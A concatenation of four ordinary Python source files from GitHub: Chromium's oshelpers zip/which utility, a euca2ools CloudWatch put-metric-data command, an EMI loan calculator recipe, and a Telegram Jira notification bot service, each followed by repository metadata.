set(zip_stream.namelist()))
if files_to_update:
# As far as I can tell, there is no way to update a zip entry using
# zipfile; the best you can do is rewrite the archive.
# Iterate through the zipfile to maintain file order.
write_mode = 'w'
for zip_path in zip_stream.namelist():
if zip_path in files_to_update:
os_path = zip_path_to_os_path_dict[zip_path]
zip_data.append((os_path, zip_path, None))
new_files_to_add.remove(zip_path)
else:
file_bytes = zip_stream.read(zip_path)
file_info = zip_stream.getinfo(zip_path)
zip_data.append((None, file_info, file_bytes))
except IOError:
pass
finally:
if zip_stream:
zip_stream.close()
for zip_path in new_files_to_add:
zip_data.append((zip_path_to_os_path_dict[zip_path], zip_path, None))
if not zip_data:
print 'zip error: Nothing to do! (%s)' % (dest_zip,)
return 1
try:
zip_stream = zipfile.ZipFile(dest_zip, write_mode, zipfile.ZIP_DEFLATED)
for os_path, file_info_or_zip_path, file_bytes in zip_data:
if isinstance(file_info_or_zip_path, zipfile.ZipInfo):
zip_path = file_info_or_zip_path.filename
else:
zip_path = file_info_or_zip_path
if os_path:
st = os.stat(os_path)
if stat.S_ISDIR(st.st_mode):
# Python 2.6 on the buildbots doesn't support writing directories to
# zip files. This was resolved in a later version of Python 2.6.
# We'll work around it by writing an empty file with the correct
# path. (This is basically what later versions do anyway.)
zip_info = zipfile.ZipInfo()
zip_info.filename = zip_path
zip_info.date_time = time.localtime(st.st_mtime)[0:6]
zip_info.compress_type = zip_stream.compression
zip_info.flag_bits = 0x00
zip_info.external_attr = (st[0] & 0xFFFF) << 16L
zip_info.CRC = 0
zip_info.compress_size = 0
zip_info.file_size = 0
zip_stream.writestr(zip_info, '')
else:
zip_stream.write(os_path, zip_path)
else:
zip_stream.writestr(file_info_or_zip_path, file_bytes)
if not options.quiet:
if zip_path in new_files_to_add:
operation = 'adding'
else:
operation = 'updating'
zip_info = zip_stream.getinfo(zip_path)
if (zip_info.compress_type == zipfile.ZIP_STORED or
zip_info.file_size == 0):
print ' %s: %s (stored 0%%)' % (operation, zip_path)
elif zip_info.compress_type == zipfile.ZIP_DEFLATED:
print ' %s: %s (deflated %d%%)' % (operation, zip_path,
100 - zip_info.compress_size * 100 / zip_info.file_size)
finally:
zip_stream.close()
return 0
def FindExeInPath(filename):
env_path = os.environ.get('PATH', '')
paths = env_path.split(os.pathsep)
def IsExecutableFile(path):
return os.path.isfile(path) and os.access(path, os.X_OK)
if os.path.sep in filename:
if IsExecutableFile(filename):
return filename
for path in paths:
filepath = os.path.join(path, filename)
if IsExecutableFile(filepath):
return os.path.abspath(os.path.join(path, filename))
def Which(args):
"""A Unix style which.
Looks for all arguments in the PATH environment variable, and prints their
path if they are executable files.
Note: If you pass an argument with a path to which, it will just test if it
is executable, not if it is in the path.
"""
parser = optparse.OptionParser(usage='usage: which args...')
_, files = parser.parse_args(args)
if not files:
return 0
retval = 0
for filename in files:
fullname = FindExeInPath(filename)
if fullname:
print fullname
else:
retval = 1
return retval
FuncMap = {
'cp': Copy,
'mkdir': Mkdir,
'mv': Move,
'rm': Remove,
'zip': Zip,
'which': Which,
}
def main(args):
if not args:
print 'No command specified'
print 'Available commands: %s' % ' '.join(FuncMap)
return 1
func = FuncMap.get(args[0])
if not func:
    print 'Unrecognized command: ' + args[0]
print 'Available commands: %s' % ' '.join(FuncMap)
return 1
return func(args[1:])
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
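# Example invocations (illustrative; the script is dispatched through the
# FuncMap above, so the first argument names the sub-command):
#   python oshelpers.py cp -v somefile.txt build/
#   python oshelpers.py mkdir -p out/nested/dir
#   python oshelpers.py zip -r release.zip src
#   python oshelpers.py which python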
|
{
"content_hash": "ecbdffe2453c52bb0439e9afa9b6edeb",
"timestamp": "",
"source": "github",
"line_count": 531,
"max_line_length": 80,
"avg_line_length": 31.322033898305083,
"alnum_prop": 0.6287878787878788,
"repo_name": "loopCM/chromium",
"id": "2ae8c4a2f3ce83f955584ea27152f3d67ca44811",
"size": "16821",
"binary": false,
"copies": "3",
"ref": "refs/heads/trunk",
"path": "native_client_sdk/src/tools/oshelpers.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
import argparse
from requestbuilder import Arg, MutuallyExclusiveArgList
from euca2ools.commands.argtypes import delimited_list
from euca2ools.commands.monitoring import CloudWatchRequest
from euca2ools.commands.monitoring.argtypes import cloudwatch_dimension
def _statistic_set(set_as_str):
pairs = {}
for pair in set_as_str.split(','):
try:
key, val = pair.split('=')
except ValueError:
raise argparse.ArgumentTypeError(
'statistic set must have format KEY1=VALUE1,...')
try:
pairs[key] = float(val)
except ValueError:
raise argparse.ArgumentTypeError('value "{0}" must be numeric'
.format(val))
for field in ('Maximum', 'Minimum', 'SampleCount', 'Sum'):
if field not in pairs:
raise argparse.ArgumentTypeError(
'value for statistic "{0}" is required'.format(field))
return pairs
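# Illustrative behavior of _statistic_set (example values, not from the
# original module): it turns the -s/--statistic-values argument string into a
# dict of floats and rejects input missing any of the four required fields:
#   _statistic_set('Maximum=9.5,Minimum=0.5,SampleCount=4,Sum=12')
#   -> {'Maximum': 9.5, 'Minimum': 0.5, 'SampleCount': 4.0, 'Sum': 12.0}
#   _statistic_set('Maximum=9.5')  -> raises argparse.ArgumentTypeError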
class PutMetricData(CloudWatchRequest):
DESCRIPTION = 'Add data points or statistics to a metric'
ARGS = [Arg('-m', '--metric-name', dest='MetricData.member.1.MetricName',
metavar='METRIC', required=True,
help='name of the metric to add data points to (required)'),
Arg('-n', '--namespace', dest='Namespace', required=True,
help="the metric's namespace (required)"),
MutuallyExclusiveArgList(
Arg('-v', '--value', dest='MetricData.member.1.Value',
metavar='FLOAT', type=float,
help='data value for the metric'),
Arg('-s', '--statistic-values', '--statisticValues',
dest='MetricData.member.1.StatisticValues',
metavar=('Maximum=FLOAT,Minimum=FLOAT,SampleCount=FLOAT,'
'Sum=FLOAT'), type=_statistic_set,
help='''statistic values for the metric. Maximum, Minimum,
SampleCount, and Sum values are all required.'''))
.required(),
Arg('-d', '--dimensions', dest='Dimensions.member',
metavar='KEY1=VALUE1,KEY2=VALUE2,...',
type=delimited_list(',', item_type=cloudwatch_dimension),
help='the dimensions of the metric to add data points to'),
Arg('-t', '--timestamp', dest='MetricData.member.1.Timestamp',
metavar='YYYY-MM-DDThh:mm:ssZ',
help='timestamp of the data point'),
Arg('-u', '--unit', dest='MetricData.member.1.Unit',
metavar='UNIT', help='unit the metric is being reported in')]
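# Illustrative command-line usage; the exact executable name installed for
# this request class is an assumption, but the options map to the ARGS above:
#   euwatch-put-data -m RequestLatency -n MyApp -v 12.5 -u Milliseconds
#   euwatch-put-data -m RequestLatency -n MyApp \
#       -s Maximum=20,Minimum=5,SampleCount=4,Sum=48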
|
{
"content_hash": "12fdffbfa5dcdae9477164bfa648a0d4",
"timestamp": "",
"source": "github",
"line_count": 56,
"max_line_length": 79,
"avg_line_length": 47.642857142857146,
"alnum_prop": 0.5745877061469266,
"repo_name": "vasiliykochergin/euca2ools",
"id": "0705c9feac1e6552c84f8fdff398b76b0f127823",
"size": "4015",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "euca2ools/commands/monitoring/putmetricdata.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "1220919"
},
{
"name": "Shell",
"bytes": "872"
}
],
"symlink_target": ""
}
|
class EMI_CALCULATOR(object):
# Data attributes
# Helps to calculate EMI
Loan_amount = None # assigning none values
Month_Payment = None # assigning none values
Interest_rate = None #assigning none values
Payment_period = None #assigning none values
def get_loan_amount(self):
#get the value of loan amount
self.Loan_amount = input("Enter The Loan amount(in rupees) :")
pass
def get_interest_rate(self):
# get the value of interest rate
self.Interest_rate = input("Enter The Interest rate(in percentage(%)) : ")
pass
def get_payment_period(self):
# get the payment period"
self.Payment_period = input("Enter The Payment period (in month): ")
pass
def calc_interest_rate(self):
# To calculate the interest rate"
self.get_interest_rate()
if self.Interest_rate > 1:
self.Interest_rate = (self.Interest_rate /100.0)
else:
print "You have not entered The interest rate correctly ,please try again "
pass
def calc_emi(self):
# To calculate the EMI"
try:
self.get_loan_amount() #input loan amount
self.get_payment_period() #input payment period
self.calc_interest_rate() #input interest rate and calculate the interest rate
except NameError:
print "You have not entered Loan amount (OR) payment period (OR) interest rate correctly,Please enter and try again. "
try:
self.Month_Payment = (self.Loan_amount*pow((self.Interest_rate/12)+1,
(self.Payment_period))*self.Interest_rate/12)/(pow(self.Interest_rate/12+1,
(self.Payment_period)) - 1)
except ZeroDivisionError:
print "ERROR!! ZERO DIVISION ERROR , Please enter The Interest rate correctly and Try again."
else:
print "Monthly Payment is : %r"%self.Month_Payment
pass
if __name__ == '__main__':# main method
Init = EMI_CALCULATOR() # creating instances
Init.calc_emi() #to calculate EMI
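# Worked example (illustrative, not part of the original recipe): a loan of
# 100000 rupees at 12% annual interest over 12 months gives a monthly rate of
# 0.12 / 12 = 0.01, so
#   EMI = 100000 * 0.01 * (1.01 ** 12) / ((1.01 ** 12) - 1) ~= 8884.88
# i.e. roughly 8884.88 rupees per month.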
|
{
"content_hash": "156d800d3d9f894a6cffca08dec6c0f9",
"timestamp": "",
"source": "github",
"line_count": 68,
"max_line_length": 136,
"avg_line_length": 34.10294117647059,
"alnum_prop": 0.5627425614489003,
"repo_name": "ActiveState/code",
"id": "ca78d35032e1d7b724a556b732f7a5b2ecd729ed",
"size": "2685",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "recipes/Python/579086_python_EMI_calculator/recipe-579086.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "35894"
},
{
"name": "C",
"bytes": "56048"
},
{
"name": "C++",
"bytes": "90880"
},
{
"name": "HTML",
"bytes": "11656"
},
{
"name": "Java",
"bytes": "57468"
},
{
"name": "JavaScript",
"bytes": "181218"
},
{
"name": "PHP",
"bytes": "250144"
},
{
"name": "Perl",
"bytes": "37296"
},
{
"name": "Perl 6",
"bytes": "9914"
},
{
"name": "Python",
"bytes": "17387779"
},
{
"name": "Ruby",
"bytes": "40233"
},
{
"name": "Shell",
"bytes": "190732"
},
{
"name": "Tcl",
"bytes": "674650"
}
],
"symlink_target": ""
}
|
import logging
from datetime import datetime
from peewee import DoesNotExist
from telegram import ParseMode
from telegram.ext import JobQueue
from config import JIRA_REQUESTS_SECONDS_PERIOD
from model import Chat, Permission, User
from service import jira_service
def init_bot(job_queue: JobQueue):
for chat in Chat.select(Chat):
add_job(job_queue, chat)
def help_command(bot, update):
bot.send_message(text="Use next commands to work with bot:" + "\n" +
"/set <username> - to setup user who's issues you "
"want to get" + "\n" +
"/me - to see your user_id",
chat_id=update.message.chat_id)
def my_id_command(bot, update):
bot.send_message(
text="Your userId - *{0}*".format(update.message.from_user.id),
chat_id=update.message.chat_id, parse_mode=ParseMode.MARKDOWN)
def set_user(bot, update, args, job_queue: JobQueue):
if update.message.from_user.id not in [p.t_id for p in
Permission.select(Permission.t_id)]:
update.message.reply_text(
"You don't have permission to get issues from this jira-service")
return
user, _ = User.get_or_create(name=args[0])
user.last_updated = datetime.now()
user.save()
t_id = update.message.chat_id
try:
chat = Chat.get(t_id=t_id)
except DoesNotExist:
chat = Chat.create(t_id=t_id)
chat.user = user
chat.save()
add_job(job_queue, chat)
update.message.reply_text(
        'You will get issue notifications from user: ' + user.name)
def send_issue(bot, job):
chat = job.context
chat_id = chat.t_id
try:
for issue in jira_service.get_new_issues(username=chat.user.name):
bot.send_message(chat_id=chat_id, text=issue.get_info(),
parse_mode=ParseMode.MARKDOWN)
except Exception:
logging.exception(
"{0}: Exception in sending issues to user with id:{1}".format(
datetime.now(), chat_id))
def add_job(job_queue: JobQueue, chat: Chat):
for job in job_queue.jobs():
if job.context.id == chat.id:
job.enabled = False
job.schedule_removal()
job_queue.run_repeating(send_issue, int(JIRA_REQUESTS_SECONDS_PERIOD),
context=chat)
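# Illustrative wiring (an assumption, not part of this module): with the
# pre-v12 python-telegram-bot API that these handler signatures target, the
# commands could be registered roughly like
#   updater = Updater(token=BOT_TOKEN)  # BOT_TOKEN is a placeholder
#   updater.dispatcher.add_handler(CommandHandler('help', help_command))
#   updater.dispatcher.add_handler(CommandHandler('me', my_id_command))
#   updater.dispatcher.add_handler(CommandHandler(
#       'set', set_user, pass_args=True, pass_job_queue=True))
#   init_bot(updater.job_queue)
#   updater.start_polling()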
|
{
"content_hash": "85e5ba7548b33391b46dcc3f2541a530",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 79,
"avg_line_length": 30.468354430379748,
"alnum_prop": 0.6024096385542169,
"repo_name": "boggard/jira-telegram-bot",
"id": "76cfc6340e1c065f048119caae5584ffb5db978d",
"size": "2407",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "service/chat_service.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "10138"
}
],
"symlink_target": ""
}
|